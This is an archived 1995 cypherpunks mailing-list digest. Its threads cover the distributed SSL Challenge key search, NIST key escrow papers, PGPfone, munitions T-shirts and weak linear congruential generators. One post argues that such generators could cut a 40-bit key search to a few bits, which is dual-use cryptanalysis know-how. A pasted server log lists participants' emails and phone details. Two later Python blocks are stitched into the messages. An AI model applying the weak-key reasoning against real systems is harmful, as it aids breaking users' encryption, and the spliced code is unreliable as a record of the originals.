In-Reply-To: <9508251423.AA15417@toad.com>
Message-ID: <199508251452.AA125582364@hp001c.skyrr.is>
MIME-Version: 1.0
Content-Type: text


> Well, the server appears to be unable to serve cgi scripts - I get 
> '500 - server error' whenever I try. I cannot report the ~500 segments
> I swept overnight, nor get new keyspace.
> 
But what also is really annoying, when I get through I only get 3 keyspaces,
even though I request 16.  I can understand the limit probably caused
by the guy yesterday who requested 50000 keyspaces 1f-something to
ce-something, but I think 3 is way too low.

> I think it's gotten to the point where the server is the bottleneck on 
> this operation - we seem to have plenty of cpu for sweeps. This will
> damage our primary goal - to demonstrate how fast 40 bits can be
> swept.
> 
I and a coworker have 4 pentiums (not much compared to some of you) but they
are idling most of the time...

> Piete, Adam, could you put a note on the /bute/ root page describing the
> server status?
Yeah.. what's up?

  Logi.

-- 
Magnus Logi Magnusson
System programmer, State and Municipal Data processing center, Iceland
E-mail: mlm@skyrr.is & mlm@rhi.hi.is




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Poppler <lwp@mail.msen.com>
Date: Fri, 25 Aug 95 12:26:35 PDT
To: cypherpunks@toad.com
Subject: SOLVED: Re: for perl experts: brclient problem
In-Reply-To: <Pine.BSD/.3.91.950825132719.4736B-100000@conch.aa.msen.com>
Message-ID: <Pine.BSD/.3.91.950825152308.19832A-100000@conch.aa.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


This no longer fails in brclient 0.17.
(Of course I still get only timeouts, but at least it tries)

On Fri, 25 Aug 1995, Lou Poppler wrote:
> I just upgraded to brclient version 0.16.
> I tried to use it with this command:
> brclient -Ltssl -a'2977 6284 390a 3 no'
> I got this result:
> Use of uninitialized variable at ./brclient line 457, <COMMAND> line 1.
> Failed: 0 <No DATA>

::::::::::::::::::::::::::::::::::::::
:: Lou Poppler  <lwp@mail.msen.com> ::   No animals were harmed in the
::      http://www.msen.com/~lwp/   ::   production of this message.
::::::::::::::::::::::::::::::::::::::




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 25 Aug 95 13:20:47 PDT
To: dawagner@tucson.princeton.edu (David A. Wagner)
Subject: Re: Cryptanalysis of S-1
In-Reply-To: <41l6u3$852@cnn.Princeton.EDU>
Message-ID: <9508252019.AA25288@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



OK, let's turn this on its head, I think we now have a good idea of how to build a 
cipher in clean room conditions such that nobody is aware of the full details of 
the algorithm.

Team 1: Develop an encryption network, implement as hardware

Team 2: Test various combinations of keyspace.features without being exposed to
	inner workings of the cipher.

Develop your Clipper chip this way and nobody can reveal the source. Fun huh?


I think we are about to see a cascade of Skipjack hoaxes regardless of the 
provenance of the original. Now people have the idea the clueless newbies will 
try.

I'm surprised nobody has tried before, I thought of constructing a Skipjack hoax 
based on DES but with larger S boxes. S1 could be made to run very fast, a 
straight through pipeline would be very nice in hardware. Anyone care to suggest 
how a secure cipher might be based on it (ie apart from the clearly bogus key 
schedule)?

I think a score sheet is in order, marks out of 5 for what? Distribution, 
technical ingenuity, credibility, annoying Dorothy, hardware suitability, 
software suitability... ?

Perhaps the NSA might volunteer to serve the page with the cumulative judgments.

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 25 Aug 95 08:26:10 PDT
To: trei@process.com
Subject: Re: SSL Challenge: Are we in trouble?
In-Reply-To: <9508251423.AA15417@toad.com>
Message-ID: <"swan.cl.cam.:051560:950825152412"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Well, the server appears to be unable to serve cgi scripts - I get 
> '500 - server error' whenever I try. I cannot report the ~500 segments
> I swept overnight, nor get new keyspace.

Try again ...

> I think it's gotten to the point where the server is the bottleneck on 
> this operation

Has been on & off for some time :-((

> - we seem to have plenty of cpu for sweeps. This will damage our primary
> goal - to demonstrate how fast 40 bits can be swept.

Well, my tertiary goal ...

> Piete, Adam, could you put a note on the /bute/ root page describing the
> server status?

Done.

In brief -- you guessed it -- upgrade to
http://www.brute.cl.cam.ac.uk/ftp/pub/brute/brclient 0.16 and ACK should go a
lot quicker, and as people move over to using 0.16, so will allocates ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeffrey I. Schiller <jis@mit.edu>
Date: Fri, 25 Aug 95 13:27:39 PDT
To: cypherpunks@toad.com
Subject: PGPfone (BETA TEST) is released
Message-ID: <9508252027.AA23240@big-screw>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

MIT is pleased  to announce that it is   now distributing the BETA  TEST
release of PGPfone.

"PGPfone  (Pretty Good Privacy Phone) is   a software package that turns
your desktop  or notebook computer  into  a  secure telephone.  It  uses
speech  compression and strong cryptography  protocols  to give you  the
ability to have a real-time secure telephone conversation."

The  Beta Test  is only  currently available  for people  with Macintosh
computers. A Windows 95 version is also in the works.

We are distributing PGPfone in the U.S. and Canada via anonymous FTP and
via the World Wide Web.

Anonymous FTP  users   should get  the  file  "/pub/PGPfone/README" from
net-dist.mit.edu. It provides instructions on how to download PGPfone.

Web Users should go to the PGPfone Home Page at:

                   http://web.mit.edu/network/pgpfone

                                -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMD4xcMUtR20Nv5BtAQGUqwQAmaOxhnbTyqdC5RicIEmiad8UbzdeJEXZ
vfdzCZl4qm94JlohYAby/hDIFqo6cPW504o7CSoWPiEGDi7AYMEX0tq3wdAIdklR
2d/AqW45YWtPrfSdLjF8+xwI41kp/lYSqF9V9ZXycguENjdhd8bnI89tT3Ah20JF
kL4q193/2O8=
=9pv/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Fri, 25 Aug 95 13:37:27 PDT
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: NIST Key Escrow Papers
Message-ID: <n1402753899.59250@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


fyi...

----

August 25, 1995

MEMORANDUM FOR Registrants for the Sept. 6-7, 1995
               Key Escrow Issues Meeting

From:  NIST - Ed Roback

Subject:  Discussion Papers

Attached for your information are two discussion papers for the
upcoming September 6-7, 1995 Key Escrow Issues Meeting to be held
at NIST.  If you have any questions on this material, you may
reach me on 301-975-3696.  

I look forward to seeing you in September.  

Attachments
                    ------------------------

Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #1


                      Issues -- Export of 
                 Software Key Escrowed Encryption


On August 17, 1995, the Administration announced its proposal to
permit the ready export of software encryption provided that the
products use algorithms with key space that does not exceed 64
bits and the key(s) required to decrypt messages/files are
escrowed with approved escrow agents.  Under the proposal,
products will be reviewed to verify that they satisfy the
criteria and, if so, they will be transferred to the Commodity
Control List administered by the Department of Commerce where the
products can be exported under a general license (in much the
same way that 40-bit RC2/RC4 encryption is licensed today).  

We are working toward creating broadly stated criteria that are
in the nature of performance specifications.  To meet these
criteria, encryption products will need to implement key escrow
mechanisms that cannot be readily altered or bypassed so as to
defeat the purposes of key escrowing.  

The criteria, when finalized and published, will state the
objectives, but not the exact technical method(s), by which those
objectives are satisfied.  This is to provide software publishers
the flexibility to design methods for meeting our stated
objectives in a manner that is compatible with the design of
their products.  There are, therefore, a number of questions we
must work together to answer in order to draft effective
criteria.  These questions are:  

*    Avoiding multiple encryption -- How can the product be
     designed so as to prevent doubling (or tripling, etc.) the
     key space of the algorithm? 

*    Disabling the key escrow mechanism -- How can products be
     made resistant to alteration that would disable or
     circumvent the key escrow mechanism?  How can the "static
     patch" problem be avoided?  How can this be tested?

*    Access to escrow information -- What mechanisms must be
     designed into encryption products to allow authorized access
     to escrowed keys?  This likely includes the identity of the
     key escrow agent(s) and a serial number for the key escrow
     agent to use to identify the key(s)/component(s) necessary
     to decrypt the message.  What other information will be
     necessary to be provided to the escrow agent to identify the
     necessary key(s)/component(s)?  Are there other comparable
     viable approaches?

*    Non-escrowed use -- How can products be made so that they do
     not function with non-escrowed products (or tampered
     escrowed products)?  How can this be tested?

*    Limiting surveillance -- How can products be designed so
     that information both sent and received by the user can be
     decrypted without release of keys of other users?

*    Practical Key Access -- How can mechanisms be designed so
     that repeated involvement of escrow agents is not required
     for decryption for multiple files/messages during the
     specified access period?

*    Assurance that keys are escrowed -- How can it be assured
     that key escrow products are indeed satisfactorily escrowed? 
     For example, products could be required to be escrowed at
     time of manufacture or be made inoperable until properly
     escrowed.

*    Ability to re-escrow keys -- How can products be designed so
     that new keys can be escrowed at the user's discretion with
     a U.S. Government approved escrow agent?

*    Certified escrow agents -- Can products be designed so that
     only escrow agents certified by the U.S. government
     (domestic, or under suitable arrangements, foreign) are
     utilized?  What should be the criteria for an acceptable
     U.S. escrow agent? 

                         --------------

With your input, we are hopeful that this effort will lead to
definitive criteria, which will facilitate the development of
exportable products and help minimize the time required to obtain
export licenses.  The Administration seeks to finalize such
criteria and make formal conforming modifications to the export
regulations before the end of 1995.  


Note:  These issues will be discussed at the Key Escrow Issues
Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
the National Institute of Standards and Technology (Gaithersburg,
Maryland).  The meeting will be open to the public, although
seating is limited.  Advance registration is requested, please
contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
mail: carlton@micf.nist.gov.


8/25/94

                  -----------------------------
Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #2


                      Discussion Issues:  
         Desirable Characteristics for Key Escrow Agents


In the government's recent announcement of its intent to allow
the export of 64-bit software key escrow encryption products, one
stipulation was that the keys would be escrowed with an approved
key escrow agent.(*1)  Exactly what qualifications/considerations
are appropriate for approval as a key escrow agent have not been
defined.  Some of the issues which need to be discussed and
resolved include the following:

*    What kinds of organizations should be excluded from
     consideration as approved key escrow agents? 

*    What sort of legal agreement between the government and the
     key escrow agent is necessary to stipulate the
     responsibilities of the agent?  Should this include the
     terms and conditions under which release of a key is
     required?  

*    How will liability for unauthorized release of key be
     handled?

*    Should, for example, intentionally misreleasing or
     destroying a key be criminalized?  Should this include other
     actions?                           

*    How can the government's needs for confidentiality of key
     release be handled?

*    Should approval of key escrow agents be tied to a public key
     infrastructure (for digital signatures and other purposes)? 

*    What procedures need to be developed for the storage and
     safeguarding of keys?

*    What are the acceptable performance criteria (e.g., around-
     the-clock availability, accessibility, reliability, etc.)
     for approved key escrow agents?

*    Under what circumstances will key escrow agents in foreign
     countries be approved?

*    What process will be used to approve escrow agents? 
     Costs/who pays?
---------
(*1)  "Approved," for the purposes of this discussion, means that
the government (or its agent) has formally granted permission for
an organization to hold keys for exportable encryption products.


Note:  These issues will be discussed at the Key Escrow Issues Meeting to be
held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at the National Institute of
Standards and Technology (Gaithersburg, Maryland).  The meeting will be open
to the public, although seating is limited.  Advance registration is
requested, please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784
or e-mail: carlton@micf.nist.gov.

8/25/95



_________________________________________________________________________
Subject: NIST Key Escrow Papers
_________________________________________________________________________
David Banisar (Banisar@epic.org)        *  202-544-9240 (tel)
Electronic Privacy Information Center   *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://epic.org
Washington, DC 20003                    *  ftp/gopher/wais cpsr.org 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 25 Aug 95 09:01:31 PDT
To: mlm@skyrr.is (Magnus Logi Magnusson)
Subject: Re: SSL Challenge: Are we in trouble?
In-Reply-To: <199508251452.AA125582364@hp001c.skyrr.is>
Message-ID: <"swan.cl.cam.:068530:950825160033"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> But what also is really annoying, when I get through I only get 3 keyspaces,
> even though I request 16.

Sorry about that -- someone misconfigured their system and walked through the 
address space asking for ranges (size 3) and then discarding them and asking 
for more.
I wasn't really expecting such small holes, so kept the allocation code REAL 
SIMPLE -- it gives the user *up to* the requested amount from the first chunk.
I see this is a bit of a bummer for you :-((
I may tweak it to look in subsequent blocks ....

>> Piete, Adam, could you put a note on the /bute/ root page describing the
>> server status?
> Yeah.. what's up?

As I said earlier, phase (1) and (2) are upsetting phase (3) ...

Basically the WWW interface was calling the SKSP interface and wedging.
WWW then used up all its permitted processes, so the WWW server died.

[[ PERL gurus out there: how can I avoid the "sh -c" process in
	$out = `cmd -a 'arg 1'`;
]]

I have freed the ACK blockage, and made the allocate code not try quite so 
hard, and now our WWW server is back in the land of the living.


The SKSP server is still seeing null sessions which time out after half a 
minute -- a bit of a bummer :-(

The hosts concerned are decent citizens most of the time (I think ...)
"|23" means "23 seconds after the call started". Any ideas ?

5/08/25 13:59:07 12992 18.43.0.244 {0,0} |11 HELO 1 bal@mit.edu Brian A. 
LaMacchia,NE43-431,3-0290,868-8042 ++ TIMEOUT ||31
95/08/25 13:59:38 12992 198.68.45.155 {0,0} ++ TIMEOUT ||31
95/08/25 14:01:48 12992 192.232.101.8 {0,0} |1 HELO 1 rgvb@alewife.kodak.com 
Richard G. von Blucher with ROC UID, GID |2 COMM brc0.14 [dlkt]: brloop0.2 |8 
INFO ++ TIMEOUT ||31
95/08/25 14:02:19 12992 128.93.8.103 {0,0} ++ TIMEOUT ||31
95/08/25 14:03:06 12992 198.68.45.155 {0,0} ++ TIMEOUT ||31
95/08/25 14:03:50 12992 128.52.36.30 {0,0} |1 HELO 1 lethin@ai.mit.edu Rich 
Lethin ++ TIMEOUT ||31
95/08/25 14:05:29 12992 134.95.80.15 {0,0} ++ TIMEOUT ||31
95/08/25 14:06:13 12992 192.232.101.8 {0,0} |1 HELO 1 rgvb@alewife.kodak.com 
Richard G. von Blucher with ROC UID, GID |6 COMM brc0.14 [dlkt]: brloop0.2 |6 
INFO |17 WORK 2977 |29 KEYS 2977 1 ==> 2977 51a8 3 ++ TIMEOUT ||32
95/08/25 14:06:55 12992 198.68.45.155 {0,0} |0 HELO 1 jcastle@in-system.com 
Jim Castleberry ++ TIMEOUT ||31
95/08/25 14:07:32 12992 204.249.46.33 {0,0} ++ TIMEOUT ||31
95/08/25 14:12:48 12992 163.173.128.233 {0,0} ++ TIMEOUT ||31
95/08/25 14:14:05 12992 204.5.88.180 {0,0} |15 HELO 1 Duncan@hasp.com Duncan J 
Watson |15 COMM brc0.14 [dLkt]: brl0.04 |18 INFO |26 WORK 29de ++ TIMEOUT ||31
95/08/25 14:15:23 12992 129.69.116.124 {0,1} |0 HELO 1 
floeff@mathematik.uni-stuttgart.de Siegfried Loeffler |0 COMM brc0.14 [dlLkt]: 
brl0.04 |0 INFO ++ TIMEOUT ||31
95/08/25 14:16:30 12992 204.215.255.3 {0,0} ++ TIMEOUT ||31
95/08/25 14:17:33 12992 128.93.8.7 {0,0} |1 HELO 1 damien.doligez@inria.fr 
Damien Doligez |1 COMM brc0.14 [dlLkt]: brl0.04 ++ TIMEOUT ||31
95/08/25 14:21:12 12992 18.43.0.111 {0,0} ++ TIMEOUT ||31
95/08/25 14:31:35 12992 128.52.36.32 {0,1} |11 HELO 1 
lethin@almond-fr.ai.mit.edu Rich Lethin ++ TIMEOUT ||31
95/08/25 14:33:51 12992 193.197.24.49 {0,0} |9 HELO 1 cg@bofh.lake.de Cees de 
Groot ++ TIMEOUT ||31
95/08/25 14:34:27 12992 202.30.52.1 {0,0} |2 HELO 1 jschoi@seodu.co.kr Choi 
Jaeseon |18 COMM brc0.08: brloop0.2 ++ TIMEOUT ||31
95/08/25 14:35:05 12992 18.151.0.165 {0,0} |13 HELO 1 zeno@madman.MIT.EDU 
Richard Duffy ++ TIMEOUT ||31
95/08/25 14:36:28 12992 155.100.229.31 {0,0} ++ TIMEOUT ||32
95/08/25 14:38:02 12992 128.93.8.81 {0,0} |0 HELO 1 damien.doligez@inria.fr 
Damien Doligez ++ TIMEOUT ||31
95/08/25 14:38:33 12992 155.100.229.31 {0,0} |0 HELO 1 
zinc@zifi.genetics.utah.edu zinc,over there,666-HATE,666-LOVE, ++ TIMEOUT ||32
95/08/25 14:39:12 12992 129.13.109.39 {1,0} |0 HELO 1 an121660@anon.penet.fi 
Olaf Erb,,, |1 COMM brc0.14 [dlLkt]: brl0.03 |3 INFO |15 WORK 2977 ++ TIMEOUT 
||31
95/08/25 14:40:40 12992 198.82.200.50 {0,0} |13 HELO 1 
millner@millner.bevc.blacksburg.va.us Robert Millner,,,(540)961-4321, ++ 
TIMEOUT ||31
95/08/25 14:41:24 12992 18.43.0.163 {0,0} |0 HELO 1 bal@mit.edu Brian A. 
LaMacchia,NE43-431,3-0290,868-8042 |14 COMM brc0.12: brl0.04 |23 INFO ++ 
TIMEOUT ||31
95/08/25 14:43:02 12992 204.215.85.69 {0,0} |2 HELO 1 
chrisg@glass.lplizard.com Leaping Lizard Software |3 COMM brc0.14 [lkntvV] |27 
INFO ++ TIMEOUT ||31
95/08/25 14:45:40 12992 18.43.0.184 {0,0} ++ TIMEOUT ||31
95/08/25 14:54:32 12992 128.93.8.124 {0,0} |0 HELO 1 damien.doligez@inria.fr 
Damien Doligez |2 COMM brc0.14 [dlLkt]: brl0.04 ++ TIMEOUT ||31
95/08/25 15:00:28 12992 128.174.241.76 {0,0} ++ TIMEOUT ||31
95/08/25 15:03:19 12992 204.5.89.50 {0,0} |12 HELO 1 duncan@hasp.com Duncan 
|12 COMM brc0.14 [dlLkt]: brl0.04 |13 INFO ++ TIMEOUT ||31
95/08/25 15:03:51 12992 128.93.8.133 {0,0} |24 HELO 1 damien.doligez@inria.fr 
Damien Doligez ++ TIMEOUT ||32
95/08/25 15:05:37 12992 18.43.0.166 {0,0} ++ TIMEOUT ||31
95/08/25 15:06:57 12992 204.215.255.3 {0,0} ++ TIMEOUT ||31
95/08/25 15:07:33 12992 128.2.198.78 {0,0} |1 HELO 1 
hgobioff@GS207.SP.CS.CMU.EDU Howard Gobioff |2 COMM brc0.13 [dlLkt]: brl0.04 
|11 INFO |26 WORK 2977 |29 KEYS 2977 1 ==> 2977 566f 3 ++ TIMEOUT ||32
95/08/25 15:09:55 12992 204.249.46.33 {0,0} |12 HELO 1 mike@uac.net Michael 
|15 COMM brc0.14 [dlLkt]: brl0.04 |22 INFO ++ TIMEOUT ||31
95/08/25 15:14:05 12992 204.215.255.3 {0,0} ++ TIMEOUT ||31
95/08/25 15:16:59 12992 158.152.9.126 {0,0} ++ TIMEOUT ||31
95/08/25 15:17:30 12992 204.5.88.2 {0,0} |20 HELO 1 duncan@hasp.com Duncan J 
Watson ++ TIMEOUT ||31
95/08/25 15:18:08 12992 140.78.101.30 {0,0} |3 HELO 1 
burge@cast.uni-linz.ac.at Mark Burge |8 COMM brc0.08: brloop0.2 ++ TIMEOUT ||31
95/08/25 15:19:02 12992 128.93.8.7 {0,0} |0 HELO 1 damien.doligez@inria.fr 
Damien Doligez |14 COMM brc0.14 [dlLkt]: brl0.04 ++ TIMEOUT ||31
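
A triage sketch for the SKSP timeout log quoted above, added here as an example and not part of this message or of the brute server code: it rejoins mail-wrapped records, reads `|N` as seconds since the call started (as the message states), and reports the last command each session reached before `++ TIMEOUT`. The sample lines are constructed, the function names are hypothetical, and treating the bare number after the time as an opaque tag is an assumption.

```python
import re
from collections import Counter

# Constructed sample in the layout of the log quoted above (documentation
# addresses, made-up users). The fourth record is hard-wrapped the way the
# mailer wrapped the original lines.
SAMPLE_LOG = """\
95/08/25 13:59:38 12992 192.0.2.10 {0,0} ++ TIMEOUT ||31
95/08/25 14:01:48 12992 198.51.100.7 {0,0} |1 HELO 1 alice@example.org Alice |2 COMM brc0.14 [dlkt]: brloop0.2 |8 INFO ++ TIMEOUT ||31
95/08/25 14:03:06 12992 192.0.2.10 {0,0} ++ TIMEOUT ||31
95/08/25 14:06:13 12992 198.51.100.7 {0,0} |1 HELO 1 alice@example.org
Alice |6 COMM brc0.14 [dlkt]: brloop0.2 |6 INFO |17 WORK 2977 |29 KEYS 2977 1
==> 2977 51a8 3 ++ TIMEOUT ||32
95/08/25 14:14:05 12992 203.0.113.5 {0,0} |15 HELO 1 bob@example.net Bob |15 COMM brc0.14 [dLkt]: brl0.04 |18 INFO |26 WORK 29de ++ TIMEOUT ||31
"""

RECORD_START = re.compile(r"^\d{2}/\d{2}/\d{2} \d{2}:\d{2}:\d{2} ")
# Assumption: the number after the time is an opaque tag (pid or port).
HEADER = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<tag>\d+) (?P<peer>\S+) \{\d+,\d+\}\s*(?P<body>.*)$"
)
TIMEOUT = re.compile(r"\+\+ TIMEOUT \|\|(\d+)\s*$")
STAGE = re.compile(r"\|(\d+) ([A-Z]+)")  # "|17 WORK" -> ("17", "WORK")


def unwrap(text):
    """Rejoin records that a mailer wrapped across several lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if RECORD_START.match(line) or not records:
            records.append(line)
        else:
            records[-1] += " " + line
    return records


def parse_record(record):
    """Return a dict for a timed-out session, or None if the record does not fit."""
    head = HEADER.match(record)
    tail = TIMEOUT.search(record)
    if not head or not tail:
        return None
    body = TIMEOUT.sub("", head.group("body"))
    stages = [(int(sec), cmd) for sec, cmd in STAGE.findall(body)]
    total = int(tail.group(1))
    last_at, last_cmd = stages[-1] if stages else (0, "NONE")
    return {
        "ts": head.group("ts"),
        "peer": head.group("peer"),
        "stages": stages,
        "last": last_cmd,          # "NONE" marks a null session
        "total": total,
        "idle": total - last_at,   # silence between last command and timeout
    }


def summarize(text):
    """Parse a log and report where sessions stall and who sends null sessions."""
    sessions = [s for s in map(parse_record, unwrap(text)) if s]
    stalled_after = Counter(s["last"] for s in sessions)
    null_peers = Counter(s["peer"] for s in sessions if s["last"] == "NONE")
    repeat_null = sorted(p for p, n in null_peers.items() if n >= 2)
    return sessions, stalled_after, repeat_null


if __name__ == "__main__":
    sessions, stalled_after, repeat_null = summarize(SAMPLE_LOG)
    for s in sessions:
        print(f'{s["ts"]} {s["peer"]:<14} last={s["last"]:<5} idle={s["idle"]}s')
    print("stalled after:", dict(stalled_after))
    print("peers with repeated null sessions:", repeat_null)
```

Splitting the timeouts by last command separates peers that connect and never speak from clients that stall after `WORK` or `KEYS`, which are different problems on the server side.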






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dhenson@itsnet.com (Don Henson)
Date: Fri, 25 Aug 95 16:07:36 PDT
To: cypherpunks@toad.com
Subject: Over 500 'Munitions T-shirts' Shipped!
Message-ID: <199508252321.RAA02314@scratchy.itsnet.com>
MIME-Version: 1.0
Content-Type: text/plain


We have thus far shipped over 500 of the RSA/Perl Munition T-shirts. 
Orders are still pouring in. Don't be left out. Order yours today. 
(Read some comments of our customers at the end of this post.)

Now you can wear a TSHIRT that has been classified as a MUNITION by the 
US Government. That's right! The US International Traffic in Arms 
Regulations (ITAR) makes exporting cryptographic materials illegal. 
ITAR further defines export as providing cryptographic information to a 
non-US/Canadian citizen even if you are inside the US at the time. 
Providing information is further defined as telling or showing 
information to a non-US/Canadian citizen. The Munitions Tshirt has a 
Perl implementation of the RSA algorithm (the one used by PGP) printed 
on the front along with a bar-code of the same algorithm.

What all the above means is that if you wear the Munitions Tshirt where 
a non-US/Canadian citizen can see it, even if it is inside the US, you 
have just exported cryptographic material (which is already freely 
available outside the US) and have become a criminal in the eyes of the 
US Government. Now you too can become an international arms dealer for 
the price of a tshirt (US$15.95 - US$29.95, depending on size) and the 
guts to wear it.

If you are a non-US/Canadian citizen, you can still own a Munitions 
Tshirt by ordering the tshirt from a source that is outside the US. The 
email response to a request for info (see next paragraph) includes full 
instructions for ordering the tshirt no matter where you live.

For more information on how to own this classic example of civil 
disobedience, just send email to wepinsto@colossus.net with the subject 
of 'SHIRT'. (You don't have to be a US/Canadian citizen to request the 
info.) Or, if you have WWW access, just point your Web browser to:

     http://colossus.net/wepinsto/wshome.html

By the way, 25% of the profits from the sale of the tshirt (in the 
US/Canada) goes to the PHIL ZIMMERMANN LEGAL DEFENSE FUND to help 
defend the author of PGP from harassment and possible prosecution by 
the Fedgoons.

And if you get arrested for wearing the Munitions Tshirt, we'll refund 
your purchase price.  :-)

                          ====++++====++++

Here are some testimonials from a few of our many satisfied customers:

"Got mine this afternoon.  Wooohhaah!!  Already had some folks at
Blockbusters point, mumble to themselves, and then ask me what the
munitions warning meant.  This is going to be fun!!  I'm a cyphernerd
for sure..."

"Thanks for the great T-shirt.  I'm making copies of your paper order 
form for others."

"I think I'll have to wear the shirt over to Logan Airport and hang 
around the International Arrivals terminal a few times.   <G>"

"I received the T-shirt on 8/3.  Thank you, it has been a pleasure 
dealing with you!"

"The first thing that I did after it arrived was to don it and then go
visit the office of one of our visiting researchers from Russia.  :)~"

                          ====++++====++++

Get your Munitions Tshirt now. Who knows how long they'll stay in 
production!

Don Henson, Managing Director (PGP Key ID = 0X03002DC9)
West El Paso Information Network (WEPIN)
Check out The WEPIN Store at URL:
http://colossus.net/wepinsto/wshome.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Fri, 25 Aug 95 15:22:53 PDT
To: Sam Quigley <poodge@econ.Berkeley.EDU>
Subject: Re: random coincidences
In-Reply-To: <199508250707.AAA14271@quesnay.Berkeley.EDU>
Message-ID: <9508252222.AA14188@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sam Quigley writes
>What are some of the more common "coincidences" and non-random
>correlations that ordinary random number generators (ones found in
>common computer languages that don't take extensive measures to be
>random) have?

The most common one is "linear correlation" between successive
random values.  The typical PRNG supplied with compilers is what's
called a "linear congruential random number generator", which has
something like:

    S0 = (user supplied seed)
    Sn+1 = ( a * Sn + b ) mod c
    Rn = f(Sn)

The choice of constants a, b, and c is critical to the process.
A decent practical discussion is in "Numerical Recipes in C".

If you take N successive random numbers and interpret them as a
point in an N-dimensional space, then the points generated by the
linear congruential PRNG don't tend to fill up the space as they
would in the "true" random case.  They tend to lie on N-1 dimensional
planes instead, and when a, b, and c are chosen poorly, sometimes
*very* few such planes.

>It seems that there's a lot of fuss about getting very random numbers,
>but unless the numbers produced by ordinary measures have very obvious
>coincidences, maybe it's a big fuss about nothing...?

If NetScape uses such a PRNG to select 40bit keys for SSL, then the
work to be done in brute-force search going on right now might be
*significantly* reduced by knowing the planes on which the numbers
lie.  If the constants are particularly poor, there might be as little
as ten or twelve bits of real key.  You could search that on a *Newton*
in less than an hour or so --- never mind the MasPars and such being used
in the current project.
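
Added example (not part of Scott Brickner's post): a Python check of the
plane structure described above, for overlapping triples (N = 3). The
constants are the historical RANDU parameters, used here as an assumed
instance of poorly chosen a, b and c; all function names are illustrative.

```python
"""Plane structure of a linear congruential generator (added example)."""
import os

# S[n+1] = (A * S[n] + B) mod C.  These are the RANDU constants, an
# assumption of this example; the post names no specific generator.
A, B, C = 65539, 0, 2**31


def lcg_stream(seed, count):
    """Return `count` successive states. RANDU expects an odd seed."""
    out, s = [], seed
    for _ in range(count):
        s = (A * s + B) % C
        out.append(s)
    return out


def plane_indices(values, modulus=C):
    """Treat overlapping triples (x, y, z) as points in 3-space and test
    them against the parallel planes 9x - 6y + z = k * modulus.

    For RANDU, A*A = 6*A - 9 (mod 2**31), so every triple satisfies the
    relation for some integer k.  Returns (set of k values that were hit,
    number of triples lying on none of these planes).
    """
    planes, off_plane = set(), 0
    for x, y, z in zip(values, values[1:], values[2:]):
        k, rem = divmod(9 * x - 6 * y + z, modulus)
        if rem:
            off_plane += 1
        else:
            planes.add(k)
    return planes, off_plane


def os_random_stream(count):
    """Values of the same size from the OS random source, for contrast."""
    return [int.from_bytes(os.urandom(4), "big") % C for _ in range(count)]


if __name__ == "__main__":
    n = 20000
    planes, off = plane_indices(lcg_stream(1, n))
    print("LCG: planes used =", len(planes), " triples off-plane =", off)
    planes, off = plane_indices(os_random_stream(n))
    print("OS : planes hit  =", len(planes), " triples off-plane =", off)
```

Every LCG triple falls on one of at most 15 planes, while output from the
operating system's generator almost never lands on any of them.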




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Fri, 25 Aug 95 17:42:54 PDT
To: CYPHERPUNKS@toad.com
Subject: SSL CHALLENGE: I told you so....
Message-ID: <8AFD417.000300036F.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


PT> I've been looking at the allocated list of keys, and I notice a possible
PT> problem:  One user has allocated 50,000 segments:
PT>
PT> 0c2b-cf7a NOACK 0c2b 50000 Joe Thomas <jthomas@ogi.com>

                                  -o-

PT> I can't contact the server to request keyspace anymore - I get a
PT> '500 Server error'
PT>
PT> It looks like 12 hours on a P5/90 are going to waste (could have done
PT> 90 segments)

                                  -o-

RL> The bottleneck at the server is pretty awful.  My clients are spending
RL> most of their time in timeout, waiting for keyspace.


<rant>

  As I watch you fumbling for keyspace IN REAL TIME....

  This is a great time for me to say "I told you so" WRT the doling of
keyspace. It is far better to sign up your volunteers, CHECK THE
ALLOCATION, and hand out starting keys, before there is even a challenge
to brute.

  The quad-coverage scheme I outlined before allows sufficient
protection against dropouts (whether accidental or malicious), so that a
single person who asked for some keyspace, but was unable to actually
sweep it, would not hurt the effort.

  Those who fail to ACK (once it is certain that the client does in fact
issue it - should have some parallel means of acking) should have their
allocation, based on my evolving formula

        available_mips = mips * idle_rate * .5**(unacks/sweeps)

for the next challenge reduced, reflecting previous unreliability. Set
up a sign-up period, add up the total available mips, figure the share
that each person should get, and assign keyspace accordingly via direct
Imail to each participant.

       The next level of abstraction is to not only give a start..end
     and direction, as I previously outlined, but supply a scaling
